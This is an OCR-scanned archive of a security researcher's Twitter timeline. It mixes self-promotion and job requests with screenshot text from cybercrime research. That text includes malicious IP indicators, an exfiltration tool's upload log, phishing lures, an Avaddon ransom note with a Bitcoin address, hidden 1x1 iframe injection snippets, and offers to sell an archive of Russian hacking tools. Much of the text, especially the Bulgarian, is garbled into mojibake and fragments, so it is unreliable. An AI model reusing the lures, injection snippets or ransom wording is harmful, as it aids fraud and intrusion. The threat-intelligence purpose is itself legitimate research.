O6sABABaM Ce KaTerOpuyHo Cpelly NpecNeABaHeTO Ha 
@bo_go OT CTpaHa Ha @dansbg u @ykolev MoctbnkatTa 
Ha BOromMu e ZOGNecTHa, HALIMOHAIHO OTTOBOPHa 


Translate Tweet 


19:38 


19:38 
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Check this out! https://t.co/4aBdJq7b4l 


Maamen [anes @mvyrb¢g - May 10, 2012 
@dansbg UYakame Bu. Uma MACTO Ha Maa. 


Check this out! https://t.co/jmISMqWwYdxX 


svesten @svesten - Mar 17, 2011 


@skanker_ y6e4eH CbM, Ue € TOW, a VU Ce BPb3Ba C BHESANHOTO MY 
Vi34ue3BaHe 


Y td Qg ty 


fan SKANKER 
@skankerx 
Replying to @svesten 


@svesten aa nutame @JavorKolev KaKBO CTaBa C 
@king_long 


Translate Tweet 


7 - Monday 


07:31 


Who needs a 5GB of Russian hacking tools for research purposes? Price is $500. 
Direct archive download possible. Ping me in case you’re interested. Regards. 
Dancho 


07:33 


I’m also offering 100GB of Russian cybercrime forums archive for research purposes. 
Price is $500. Direct download possible as well. Ping me in case you’re interested. 
Regards. Dancho 
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"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 
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195.149.87.233 


185.158.249.249 


31.214.157.242 


38.92.176.125 


195.123.219.82 


185.158.249.119 


23.146.242.134 


51.38.95.29 


46.19.136.221 


142.4.211.167 


195.123.221.248 


37.187.24.215 


5.34.181.18 


194.76.225.152 
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iG 3: 


296 1e0c7554e735093237bf6 12406d5d 77a7e9138f3ea3eb5b7 ae00bc2bbedfs 
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[+] WinSock initialized 
C+] 10 completion port initialized... 


Check serve 


{+] Server 


vy 139.686.166.206... 
connected . 


Stats: 6 files ‘size 20.9 MB>, read speed 4.18 MB/sec ‘(compression ra 
tio 91%>, upload 6 bytes/sec 
ats: 71 files ¢size 529 MB>. read speed 26.4 MB/sec ‘compression ra 


St 
tio 99~%>, upload 8.31 
Stats: 166 
ratio 99%>. upload 22. 
Stats: 266 
ratio 99~%>,. upload 25. 
Stats: 336 
ratio 99%>,. upload 25. 


MB/sec 

files “size 2.17 GB>. vead speed 27.8 MB/sec Ccompression 
9 MB/sec 

files “size 3.75 GB>, vead speed 27.4 MB/sec “compression 
@ MB/sec 

files “(size 5.36 GB>. vead speed 27.4 MB/sec ‘compression 
6 MB/sec 
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1 
Amazon 30th Anniversary Celebration 
Amazon's 30th Anniversary Celebration is coming to an end. 
Today is the last stage of the raffle for a USD 10-200 gift card and other prizes 
To participate in the raffle, you need to download the Lottery App and generate a unique code 
t n t appl for p 
How to take part in the raffle? 
l he app 
2. Run the application, The application will generate a code to participate in the lottery 

ter the code in the text field belo 
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@ Apple 
Hello! 


‘We are aston for your help. Please check the wformamon in the generated 
ivoxte [ provide. Your email provider rejects a letter with attachments. 
Sa, 


Provide all the related informabon a4 $000 as you Can. 
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#cyberattacks #CyberSec #Threatintel #ThreatHunting #Threatintelligence 
#threatreport https://t.co/nshwyFLHQp 
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lg z Manage 
| Fite | Home Share View Application Tools 


a ~ *® > ThisPC > LocalDisk(C:) » Users >» TSTIOENG >» Downloads >» dil2 
a Quick access nts 

BB Desktop Ta a 

} Downloads 

| Documents 

© Pictures 

d Music 

4 Videos 


cmd.exe - Application Error x 
@& OneDrive 


> The application was unable to start correctly (0xc0000005). 
( This PC (x) Click OK to close the application 
a} Network 


[ox | 
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"Exposing the Conti Ransomware Gang - An OSINT Analysis" - 


https://t.co/vSCjG6FXyB #security #cybercrime #malware #CyberAttack 
#cyberattacks #CyberSec #Threatintel #ThreatHunting #Threatintelligence 


#threatreport https://t.co/T60waLR3Ex 
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SQLSTATE[42S22]: 
Column not found: 1054 


Unknown column 
‘api_token’ in ‘field list’ 


iuminate\Database\QueryException 


Doctrine\DBAL\DriveriPDOException 


PDOException 


PDO prepare 
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JSON Raw Data Headers 


Copy 


Response Headers 


Cache-Control no-cache, private 
Connection Keep-Alive 
Content-Length 2 
Content-Type application/json 
Date Mon, 29 Jun 2020 13:55:53 GMT 
Keep-Alive timeout=5, max=100 
Server Apache/2.4.2 (Win64) PHP/7.3.13 OpenSSL/1.0.1¢ 
X-Powered-By PHP/7.3.13 
X-RateLimit-Limit 60 
X-RateLimit-Remaining 59 


Request Headers 


Accept text/html,application/xhtm!+xml,application/xml:q=0.9,*/";q=0.8 
Accept-Encoding zip, deflate, br 
Accept-Language en-US,en:q=0.5 
Connection keep-alive 
Host a3gqqjhcskbjg36bx.onion 
Upgrade-insecure-Requests 1 
User-Agent Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 
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The code execution cannot proceed because MSVCPXO.all was 
not found. Reinstalling the program may fix this problem. 


OK 
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¥ pexosepu HepTakokK KOAOHKH 


3rgetP : :where 
1: :create([ 


return getChatUser 


} else 
return [ 
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(Fler err nese) Ep meeeres Porerrnemener Boverrer Zinmer 


Prone 


Your network has been infected by Avaddon 


encrypted 
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See 


To decrypt your files you -« 


t w. Follow the 


imtrection below ¢ 


General Decryptor that you de not have much tiene 


Time left: 


To recover your files, 
you must pay the fee. 


itty up because your 50% dis 
ve after th ter will reach zer 
f you fail to pay until that time, the fee will be 


f & was 10005 will become 20008. 


0.1261769 BTC to this address 
3HhyrkzbASkU33HL9ZHC 1 SyhbDda2fgitu 


#threatreport https://t.co/5tn3artqyy 
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how it works 


@) 
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AMIIYJIbC K KA3HH 


BAATOTBOPUTENbHbIN DOHA 
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, The code execution cannot proceed because MSVCR100D.dll 
was not found. Reinstalling the program may fix this problem. 


OK 
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, The code execution cannot proceed because MSVCR100D.dIl 
was not found. Reinstalling the program may fix this problem. 


OK 
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€ C oO¢é a3ggjhcskbjg36bx.onion oe Ye ae 
Enigma 
} Send 
CR © mspector () Console (© Debugger {} Ste Editor (Performance (} Memory fJ Network (F Storage Fr Accessibility GJ * xX 
BG Persist Logs 
| Errors | Warnings | Logs | Info | Debug MERE 
bsesceascfhses1b178S2e00542364C1:98:17 


user 

A Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at etee //a3ggjhcskbjg3é6bx. onion: 6082 
/socket.10/7€1O=34Cransport=pollingét=NEwhrk@. (Reason: CORS request did mot succeed). [Learn Mo 

A Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at nettps: //a3ggiheskbjg36bx. onion: 6001 
/socket.i0/7€10=34transport=pollinga&t=NEwhtv4. (Reason: CORS request did mot succeed). [Learn More) 

A Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at actps: //asggihcskbjgsébx. onion: 6002 
/socket.i0/78LO#J4cCransporlapollingaécentwhusie. (Reason: CORS request did mot succeed). [Learn More) 
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RunDLL 


? There was a problem starting 
\ ) C:\Users\user\Downloads\1\dl2.dll 


The specified module could not be found. 
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cmd.exe - Application Error x 


( v ) The application was unable to start correctly (0xc0000005). 
a” Click OK to close the application. 
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The program or feature "\??\C:\Users\TST7x64\AppData\Local\ Temp\C8FC.exe" 
cannot start or run due to incompatibity with 64-bit versions of Windows. Please 


contact the software vendor to ask if a 64-bit Windows compatible version is 
available. 
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Failed - Virus detected 
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#Threatintel #ThreatHunting #Threatintelligence #threatreport 
https://t.co/gRKtwVfSEZ 
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10 - Thursday 


19:41 


https://t.co/WIBGTU5ryT RT please! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #Threatintelligence #Threatintel #ThreatHunting 
#threatreport https://t.co/NPEYmxKYN3 
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14 - Monday 


15:38 
Courtesy of me! CC: @Cryptome_org https://t.co/a7Dovo7MdB 
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Image 6 : NCW Attack Formation 


15 - Tuesday 


09:56 


Exposing #Bulgaria’s Involvement in Cold War Espionage - Who Stole the PC and 
Build a Fake Pro-Western Empire? - An #OSINT Analysis - https://t.co/BYBIgNoM9y 
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Exposing #Bulgaria - Or Who Build the Soviet Union’s Virus Factories in the 90’s? - 
An #OSINT Analysis - https://t.co/5R8OCWkJMS 
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Subscribe to Dancho Danchev’s Newsletter, by @dancho_danchev 
https://t.co/vSyNCsr5g4 


19 - Saturday 
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01:16 


We have a new blog on Hybrid Warfare at https://t.co/fnswrm8KWP - the original 
search engine for hackers circa 1994 which you can access here - 
https://t.co/Gf9CXdOpa|I including the first post here - https://t.co/GuMftgJfsa Enjoy! 
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Cheers! https://t.co/3sWSurgBq7 


Bupmyaano npocmpaxcmBo 


KABEPTEPOPUASMbI 
TOKOAKO PEAAEH E MPOBAEMbT? 


VUHOOPMALIMOHHATA VKOHOMMUKA, 8 koamo 
cBemom HaBseze npe3 nocaeguume 20 20guxu, 
GaazonpuamcmBa pasBumuemo Ha mogepHUMe 
cpegcmBa 3a kKomyHukauur, pas6uBadku mexgykoH- 
mMuHeHmaaKUMe U emHUYeCcKU 2paHuUU, NpuUgaBad- 
ku HOBu U3MepeHUA Ha NOKHAMUeEMO UHdOPMaUU- 
OHHO O6uwecmBo, a Make 6u MoUKOMO NOHAMUe 
€@ uxPopMauUOHHO-3aBucumMo ObwecmBo! 

Ta3u Cmamua ce cmpemu ga pa3enega npoGvema 
3a ukdopmMauuOHHama Bodna u kubepmepopuama, 
koGmo HeUgMeHHO A CoNe>mcmBa, om pasgaUUHU 
2aeguu mouku. TA we om2oBopu Ha cAaegHume 
Benpocu - kakBo e kubepmepopu3em u kakBa 
e@ pazsukama mexkgy He20 U UNPOPMauUOCHHaMa 
BoGHa? Mozam au gedcmBuama Ha uxdopmauu- 
OxHama Bova u e kubepmepopugem ga npegus- 
Bukam uoBewku »*kepmBu uAu ukoHOMUYeCKU xaoc 
u kak8u ca Be3smoxkHUMe CueHapuU? 
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Cheers! https://t.co/AOG2B8dQUc 
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20 - Sunday 
01:55 


Anyone hiring journalists or freelance writers? 
07:31 


Did you know that #Bulgaria stole the PC from the U.S and build a fake Pro-Western 
Empire courtesy of Bulgaria’s Durzhavna Sigurnost under the COCOM embargo? 
Awesome! https://t.co/3z9ksCH1d1 [PDF] guess who uploaded the archive to 
@Cryptome org? | did! https://t.co/FihhxycSH6 
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07:32 


Did you know that back in the day | used to posses a Pravetz 16 PC which was 
basically an IBM clone? | used to visit https://t.co/rmXzey30Go on a daily basis using 
my own modem which was quite a privilege back in the day. Stay tuned! 

07:32 


Exposing #Bulgaria’s Involvement in Cold War Espionage - Who Stole the PC and 
Build a Fake Pro-Western Empire? - An OSINT Analysis - https://t.co/YEOWIAtXjT 
https://t.co/VXjayPYSXn 


hre Welcome to 


07:32 
Exposing #Bulgaria’s "Durzhavna Sigurnost" - The Complete Technical and Scientific 
Collection Archive During the Cold War - An OSINT Analysis - https://t.co/qBbOI3zR5f 
07:33 
Exposing the "KGB Hack" a.k.a Operation EQUALIZER - An OSINT Analysis - 
https://t.co/KDPYiIEKDQQ 
07:33 
Exposing #Bulgaria - Or Who Build the Soviet Union’s Virus Factories in the 90’s? - An 
OSINT Analysis - https://t.co/c9XGjM3iaO 
07:36 


Looking for a true marvelous true and inspiring story on how | did not stole the PC 
and didn’t build a fake Pro-Western empire? Check out memoir here - 
https://t.co/qLxz4GuRip [PDF] including my "inside story" here - 
https://t.co/kyl5GvScSi #Bulgaria 


07:52 


RT @juliocesarfort: @roman_soft @_alt3kx_ it’s just Dancho Danchev trying to make 
a comeback after years out of the spotlight and battling... 
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07:57 


A group of people gathered once upon a time without them knowing and started 
building and working on something big and new. | was alone thinking that once you 
walk in a forest and meet a tree they’re usually two ways around it. | took the 
undertaken one. 


07:59 


The only single quote that I’ve ever read in my entire lifetime - "What use are they? 
They’ve got over 40,000 people over there reading newspapers" - 
https://t.co/tyuzOS5z0g [PDF] Awesome! Awesome! Thanks a lot for the career 
achievements. 


08:03 


This is the second quote I’ve ever read in my entire lifetime - "Communications 
without intelligence is noise. Intelligence without communications is irrelevant." 
Network centric warfare is everywhere! Embrace it! https://t.co/CbnyL6Uuh5 


08:03 
The nukes are coming! The nukes are coming! - https://t.co/2Ib2FFXYN7 #Bulgaria 


10:41 


New Twitter Profile Photo! Who’s on Facebook? - https://t.co/AIXOA6DHVy 
https://t.co/lOd7ONU8VK 
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22 - Tuesday 


00:10 


https://t.co/uvAt5gK9BA https://t.co/JFGypCdiLm 
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Main navigation 


ees) Search Engine 
=) Notification center 
G) About 


00:10 
https://t.co/uUvAt5gK9BA https://t.co/7jIDeoYwwD 
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INTRODUCING BOX.SK’S - “HOW TO 
GET IN TOUCH WITH THE KGB — THE 
DEFINITE HACKER’S MANUAL’ ONLINE 
MANUAL 


admin 3 months ago 


Future Trends” 


Years Later 


Dancho 
Danchev's 
Personal 


Carseribus 


03:10 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #Threatintelligence 
#Threatintel #threatreport https://t.co/d9fPcsC2LK 
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Main navigation 


Medium 


=) Notification center 
G) About 


04:57 


Anyone who wants to invite me to present at their security event virtually? 


04:57 
Any private mailing lists or invite-only security communities that you want to invite 
me to? 
05:00 
Have you taken the time to go through my 100 pages memoir? The story is not over 
yet so stay tuned. Here’s PDF link in multiple E-Book readers formats - 


https://t.co/WeZmxLgin2 for free! Share your feedback please and stay tuned for the 
second edition! 


620 


05:01 


Are you interested in reading all of my research in multiple E-book reader formats? 
For free? I’ve archived everything at the Internet Archive here - 
https://t.co/UZ6qVANXxVF grab a copy today and stay tuned for more! 


05:14 
Who wants to know me better? Check out this video - https://t.co/DHoD9j26nY and 
stay tuned for more. 
05:15 


This is a second video which | recently did on the InFraud Cybercrime Organization in 
a demonstration with Maltego - https://t.co/k8QSmgWHZ29 stay tuned for more. 


*1 
05:16 
This is a third video which | recently did where | teach and practice how to catch and 


profile FBI’s Most Wanted Cybercriminals using OSINT and my methodology - 
https://t.co/n8K5tSJAfR stay tuned for more. 


*1 
05:18 
We have a new blog at https://t.co/PetnTEMIL3 which you can find here - 


https://t.co/Gf9CXdOpq} including the first post which you can find here - 
https://t.co/GuMftgJfsa stay tuned for more. 


05:22 


@k8em0 @ciaranmartinoxf I’m seeing the usual iFrame based crowd-sourced HTTP 
get flooders including a Windows based application courtesy of a company which is 
offering help to Ukraine and building hit lists of Russian Government Web sites. 
Here’s an analysis - https://t.co/tvPw6es TeM 


*1 
07:31 


Who's online and what are you doing in terms of cybercrime research and threat 
intelligence gathering? 


*2 
07:34 


Ransomware or who cares? - https://t.co/Pj15rxfLTZ also check out my "Malware - 
Future Trends" paper circa 2006 where | somehow anticipated the rise of cryptoviral 
extortion which was a buzz word at the time - https://t.co/dZZINmGYu8 

07:40 
Did you know? | made it to Slashdot two times. Here - https://t.co/ogWebSViBO in 
2006 and here - https://t.co/x65aFCQdSd in 2011. 


621 


07:42 


Surprise! Who wants full offline copy of my personal blog in various E-Book formats 
for free? Check out the Internet Archive here - https://t.co/JT676NfPZI and don’t 
forget to go through all the Web 2.0 buzz including all the censorship content. 
https://t.co/wEUSgsqRdF 


Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understandin 
of Security Hacking an 
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 


07:44 
@CryptoThn How exactly are you tracking them? Using public sources or using 
another methodology? Dare to share the details? 
07:49 


Did you know that | used to run https://t.co/Xest1SInvx during 2003-2006? In case 
you're interested in a copy of the Security Newsletter grab it from the Internet 
Archive here - https://t.co/PGLUftNfUs best wishes to everyone from Team Astalavista 
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https://t.co/XvULyO3IMp 


07:53 


Did you know that | used to be into Information Security once which is how | actually 
got into the security industry as a hacker enthusiast during my teenage and student 
years? This is one of my first white papers - https://t.co/V1Ee3jryGx 


07:55 
This is me on cyber warfare - https://t.co/utsrBhju8W enjoy! 


07:56 


Interested in going through some of my presentations? Here’s the actual archive - 
https://t.co/nNsXMPrGi0O 


07:57 


Here’s my Keynote on Koobface from @CybercampEs 2016 - https://t.co/q5iTxLwmK1 
enjoy! 


23 - Wednesday 


01:21 
New research courtesy of me for @whoisxmlapi - https://t.co/100jzZDTvq enjoy! 


01:22 


Remember the infamous Innovative Marketing scareware distributor? Check out my 
latest research for @whoisxmlapi on the topic here - https://t.co/SLtOGhInxK enjoy! 


01:23 


Here’s also a podcast which | did for @whoisxmlapi on mapping the bad guy’s 
malicious infrastructure which you can check here - https://t.co/39JWq7V8Md enjoy 
and stay tuned for more 


01:25 


Check out my "Cyber Intelligence" memoir here - https://t.co/WeZmxLgin2 available 
in multiple E-Book reader formats and stay tuned for more 
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01:28 


Cheers to @securityblvd for referencing my "Who is Dancho Danchev?" post here - 
https://t.co/cJ1P3g5rdn which can be also described as a case study on how to build 
an information security industry "at home". Stay tuned for more. 
https://t.co/uugSV3gAI8 


01:33 


Interested in knowing more about my career experience as a hacker enthusiast 
during the 90’s up to present day? Check out my "The Inside Story Behind the Life of 
ex-Bulgarian Hacker Dancho Danchev" Medium article here - https://t.co/kyI5GvScSi 
and stay tuned 
08:19 


@NCbassey | can do security blogging. 


624 


24 - Thursday 


08:03 


08:04 


https://t.co/JTcqOaYgET https://t.co/ik7hle2J8E 
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https://t.co/JTcqOaYgET https://t.co/AOO0hx1fGoz 


08:05 


https://t.co/JTcqOaYgET https://t.co/o8h4jBwcVc 
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08:05 


https://t.co/JTcqOaYgET https://t.co/fopulv5vxY 
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08:05 


https://t.co/JTcqOaYgET https://t.co/SxaThTUdCG 
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08:06 


https://t.co/JTcqOaYgET https://t.co/mrilkDasFMM 
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08:06 


https://t.co/JTcqOaYgET https://t.co/AatrCdwEth 


630 


08:07 


https://t.co/JTIcqOaYgET https://t.co/dHeeQolIndc 


08:08 


https://t.co/JTcqOaYgET https://t.co/Ss1VqHe]JJN 
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08:08 


https://t.co/JTcqOaYgET https://t.co/2DnmmZHQai 
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08:09 


https://t.co/JTcqOaYgET https://t.co/frlU3ONtXN 
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08:10 


https://t.co/JTcqOaYgET https://t.co/YMH36wJWhR 
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08:10 
https://t.co/JTcqOaYgET https://t.co/655N9eGkVk 
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08:10 


https://t.co/JTcqOaYgET https://t.co/vVimPvaZMD 


08:10 


https://t.co/JTcqOaYgET https://t.co/2ThAtduKpG 


638 


08:10 


https://t.co/JTcqOaYgET https://t.co/a4GPIFLeil 
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08:11 


https://t.co/JTcqOaYgET https://t.co/WpPFax5DvC 
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08:11 


https://t.co/JTcqOaYgET https://t.co/oltpiZpnLj 
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08:11 


https://t.co/JTcqOaYgET https://t.co/3X7JG42y]F 


642 


08:11 


https://t.co/JTcqOaYgET https://t.co/FPErkpixSwW 
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26 - Saturday 


03:48 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cyberattacks #cyberwar #cybersecuritytips #Threatintel 
#Threatintelligence #ThreatHunting #threatreport https://t.co/42658l4mkD 
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28 - Monday 


00:44 


Who wants to really work with me? Are you a vendor or an organization that wants to 
acquire my public STIX/STIX2/TAXII feed - https://t.co/OmUajr8DT8 and have me 
populate it with research on a daily basis? Drop me a line. Brochure - 
https://t.co/sElhv2bb8t https://t.co/KCL3MB3TeD 


*1 
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30 - Wednesday 


10:14 

Does anyone know anyone at the Organized Crime and Corruption Reporting Project 
@occrp and can anyone do an introduction? 

11:32 


My new Twitter BIO - "Independent Contractor. https://t.co/Xest1SInvx (2003-2006) - 
Slashdotted Two Times - Ex-@ZDNet - Ex-@Webroot - Won Jessy H. Neal Award - Won 
@SCMagazine Award" always "bother" me at https://t.co/JTcqOaYgET 
https://t.co/Kqrfh27Ddm 
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12:09 


Aggregate Item Use Show stats for | all time ¥ | 


2010 2015 


Wednesday, December 14, 2005 — Saturday, September 14, 2019 


* 2,572,020 Views of 1038 items 


. 6,497,440 Clicks back to the site on 1217 items 


Thanks @Geraldanthro for all the assistance in tracking me down and actually finding 


me back in 2011! It’s always a pleasure to know that you’ve followed and | hope that 
you’re still following my work and research. Best wishes and keep up the good work! 


31 - Thursday 


03:28 


https://t.co/dS5vVv6AmyYr 


https://t.co/HBrH9ck2qD https://t.co/UGMQUJ9qfxX 


VMsitors [_} Msits 
9,000 
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11:34 
Thanks @teamcymru for following me! Regards. Dancho 


April 


4 - Monday 


20:16 


Who wants to write a book with me? Drop me a line at dancho.danchev@hush.com 
#security #cybercrime #malware #CyberSecurity #CyberAttack #Threatintel 
#Threatintelligence #ThreatProtection #threatreport 


21 *%2 


6 - Wednesday 


18:45 
https://t.co/OmUajr8DT8 https://t.co/GFaj9VtbyZ 
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18:45 


https://t.co/OmUajr8DT8 https://t.co/kqmXCXLZdh 


18:45 
https://t.co/OmUajr8DT8 https://t.co/Xdw6lv7FoP 


18:46 


https://t.co/OmUajr8DT8 https://t.co/CkAmafhQQW 
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18:46 


18:46 


STIX2 ... (172/17 


) ‘Adobe License Service Center ( 


‘October's Billing Address Code 
‘Sent from my iPhone’ Emails E> 
‘T-Mobile MMS message has ani 
You received a new message fr 
66.1 Host Locked 

A Diverse Portfolio of Fake Secu 
A Diverse Portfolio of Fake Secu 
A Diverse Portfolio of Fake Secu 
A Diverse Portfolio of Fake Secu 
A Diverse Portfolio of Fake Secu 
A Diverse Portfolio of Fake Secu 


2) 


https://t.co/OmUajr8DT8 https://t.co/afuYCsa5ok 


https://t.co/OmUajr8DT8 https://t.co/oZ2jfqJgEl 
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18:46 
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https://t.co/OmUajr8DT8 https://t.co/yp9QUZhcRd 


18:47 


We Cover the Following Threat 
Intelligence Feed Categories 
Historically and in Real-Time 


~ The Russian Business Network Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


~ Cyber Jihad Online Activities Coverage — Complete Qualitative and Incident and Campaign 
Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of loCs 
(Indicators of Compromise) and MD5s 


— Proliferation of DIY Hacking Tools Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


— The Rise of Rogue Antivirus Software Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


— Cybecrime DIY Tools and Artifacts Coverage — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


— Web Malware Exploitation Kits Incidents and Campaigns — Complete Qualitative and 
Incident and Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant 
Emails thousands of loCs (Indicators of Compromise) and MD5s 


— Blackhat SEO Campaigns and Incidents — Complete Qualitative and Incident and Campaign 
Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands of loCs 
(Indicators of Compromise) and MD5s 


~ Embedded Malware Campaigns and Incidents — Complete Qualitative and Incident and 
Campaign Based Analysis Which Includes Domains/IPs/ASNs/Whois Registrant Emails thousands 
of loCs (Indicators of Compromise) and MD5s 


https://t.co/OmUajr8DT8 https://t.co/8BnmeZEu9n4 
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18:47 
https://t.co/OmUajr8DT8 https://t.co/UOOpRbAeiH 
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9 - Saturday 


01:11 


https://t.co/waW3ZbhZjE - O6uHOCcT 3a UVHcbopmMaliMoHHa KomntoTbpHa U MpexosBa 


CurypHoct #Bulgaria https://t.co/50IhrGt53i 
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21:27 


21:27 


21:28 


21:29 


21:30 


21:30 


21:30 


21:31 


21:31 


21:31 
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BuptyaseH Dopym 3a MadopmManMoHHa 
KomiroTppHa 4 Mpexosa CurypHoct 


JjuckyCcHH 3a 300HaMepeH KOZ, 
coTyepHH rpeniku, IporpaMu, 
Kypcobe H pecypcH 3a 
HHPOpMalHOHHa KOMIIOTEpHa 


H MpexoBa CHI ypHOCT 


https://sigurnost.bg 


https://t.co/8pw8alG6QA 


https://t.co/I2Id1pjOU5 


https://t.co/afUOhgH7dO 


https://t.co/b9pjOCHvUe 


https://t.co/nEP8dzsfif 


https://t.co/DG8oga3lpo 


https://t.co/8BOZRbPnD3N 


https://t.co/AvBqVjHYE7 


https://t.co/167MOpviF 


https://t.co/R8dKhrQWX6 


21:32 
https://t.co/aTVOIgB3Gr 


21532 
https://t.co/QfuLP273E9 
21:32 
https://t.co/NfVf7 DQaRH 
2133 
https://t.co/PVFrADkGwX 
21:36 
https://t.co/waW3ZbhZjE https://t.co/2uwvijbxp2 
BuptyaseH Dopym 3a MadopmMalMonHa 
KomiroTppHa 4 Mpexosa CurypHoct 
JiHckyCHH 3a 310HaMepeH KOZ, 
codtTyepHH rpelikH, IporpaMH, 
Kypcobe H pecypcH 3a 
HHPOpMaljHOHHa KOMIIOTEpHa 
H MpexOBa CHIypHOCT 
https://sigurnost.bg 
10 - Sunday 
07:20 
https://t.co/8kadUyEttk 
07:58 


Guys and girls. Who wants to hire a security blogger? CV here - 
https://t.co/O4zpbx2RSb @ZDNet Zero Day portfolio here - https://t.co/3vqmctZzHf 
@Webroot portfolio here - https://t.co/tW2LuSxdSi [PDF] RT pls! Ping me here! 


08:01 
I'm "desperately" looking for the opportunity to come back on the scene as a security 
657 


blogger and anything that you can offer as a direct hire proposition would be greatly 
appreciated. Here’s my portfolio - https://t.co/UZ6qVANXVFE RT pls! 


08:04 


| can also do security and investigative reporting and anything that you could offer 

for this position would be greatly appreciated. Feel free to go through the archives 

here - https://t.co/JTcqOaYgET or check out my Onion here - https://t.co/4CqIL2cSeH 
https://t.co/EPN3inpoaE 


08:18 
My Dark Web Onion - https://t.co/4CqIL2cSeH so far so good! https://t.co/rLlaoevaDmu 
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U.S Intelligence Community 2.0 


RECENT POSTS 


Intell on the Criminal 


Underground - Who’s Who in 
Cyber Crime for 20077 


iframe src= .jn404-1.htm width= 1 height=1 > </iframe> 
Frame src=./n404-2.him width=1 height=1 > </iframe> 
iframe src=,/n404-3.him width=1 height=1 > </iframe> 


RECENT COMMENTS 


15 - Friday 


10:09 
Doing book promotion. https://t.co/GM3JMWhhOw 
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https://t.co/uvAt5gK9BA https://t.co/t1BN5yo2le 
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https://t.co/OmUajr8DT8 https://t.co/cCIL9Fpd1L 


662 


00:28 
https://t.co/OmUajr8DT8 https://t.co/lynROw1FSP 


00:29 


https://t.co/OmUajr8DT8 https://t.co/hjwGolmjCe 


00:29 
https://t.co/OmUajr8DT8 https://t.co/O4MFFWsTgy 
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A Diverse Portfolio of Fake Secu 

A Diverse Portfolio of Fake Secu 
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A Diverse Portfolio of Fake Secu 

A Diverse Portfolio of Fake Secu 


A Diverse Portfolio of Fake Secu 
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18 - Monday 


22:17 


https://t.co/HBrH9ck2qD #security #cybercrime #malware #CyberAttack 
#cybersecuritytips #CyberSec #cyberwar #CyberSecurityAwareness 
#Threatintelligence https://t.co/ZUtujrQm25 
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01:50 
https://t.co/uvAt5gK9BA https://t.co/zPSxbsDY1n 
Main navigation 
Medium 
C=) Notification center 
G) About 
01:51 


https://t.co/uvAt5gK9BA https://t.co/oDOHBOBMrA 
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07:22 @ + & - 


INTRODUCING BOX.SK’S - “HOW TO 
GET IN TOUCH WITH THE KGB — THE 
DEFINITE HACKER’S MANUAL’ ONLINE 


MANUAL 


admin 3 months ago 


xclusive Interview with Revisiting "Mz 
Future Trends” 


Years Later 


Dancho 
Danchev's 
Personal 


Carseribus 


https://t.co/uvAt5gK9BA https://t.co/ixS6ICS9id 
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Keeping it cool! https://t.co/OmUajr8DT8 https://t.co/loXoP8kcHv 


670 


Mabeare Part Th 


J cetera Usrware Campana Rotating Tato 


Oy le fewere Crees Merry bepiesty 


ho ot Fake Secuty Software Part fie tens Locus ty Loftewe 


Spe Campedge Abveng Yahoo? Serrcet 


ape Trends Keywords for Btacthat Sf 0 


Pattee 


A Fake Socurty Software 


Of ake Securty Software 


take tem ue ty wears 


Ry Video Sites Serving Mdatware Part Two 


tate r0cr ty software 


1 ae Mee 


02:10 
Keeping it cool! https://t.co/OmUajr8DT8 https://t.co/WAGB1sDseY 
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Keeping it cool! https://t.co/OmUajr8DT8 https://t.co/Ycupg!lQQbl 
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Keeping it cool! https://t.co/OmUajqR2uy https://t.co/ezLqloFSQi 
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No audio. Who wants API key here? https://t.co/OmUajr8DT8 https://t.co/odrCHXRO6R 


673 


23 - Saturday 


07:37 


Dear friends and colleagues. Who wants to socialize here with me? Post a comment 

and say "hi" or "keep up the good work" and it would be greatly appreciated. Check 

out https://t.co/JTcqOaYgET including my Dark Web Onion - https://t.co/HBrH9ck2qD 
stay tuned! https://t.co/lIOgZ82|19qb 
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24 - Sunday 
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02:13 


Second Premium Interactive Edition of my "Cyber Intelligence" memoir is on its way. 
Wish me luck! There will be a lot of interactive content in terms of audio and video 
material and I’m also taking a summer break! Happy Easter and Happy Summer! 

https://t.co/QrRDtjsjJM 
*4 
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* C hererime and 
eh of Dancho! 


i The Deli 


02:14 


Second image in a row. My savings go here. I’m looking for a place to crash during 
the holidays. Wish me luck and stay tuned for the Second Premium Interactive 


Edition of my "Cyber Intelligence" memoir. Happy holidays! https://t.co/uf2TKgHU5h 
*1 


02:15 


Outfit ready! See you after the holidays and stay tuned! Happy Holidays! 
https://t.co/KN2T9eBVCg 
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2 - Monday 


23:05 
My latest white paper courtesy of me for @whoisxmlapi - https://t.co/xs8XDutSVp 
grab a copy today! 
23:06 


My second white paper courtesy of me for @whoisxmlapi - https://t.co/oDOWGP22dk 
grab a copy today! 


4 - Wednesday 


20:31 


My third white paper courtesy of me for @whoisxmlapi - https://t.co/LubITAHTAQ grab 
a copy today! 
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5 - Thursday 


04:56 


Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum 
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and | would be 
happy to offer access for research purposes. Regards. Dancho 


https://t.co/oX7KbADYbm 
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Folks. Guys and girls. Who wants access to my 77GB and counting Cybercrime Forum 
Data Set for 2022? Drop me a line at dancho.danchev@hush.com and | would be 
happy to offer access for research purposes. Regards. Dancho 
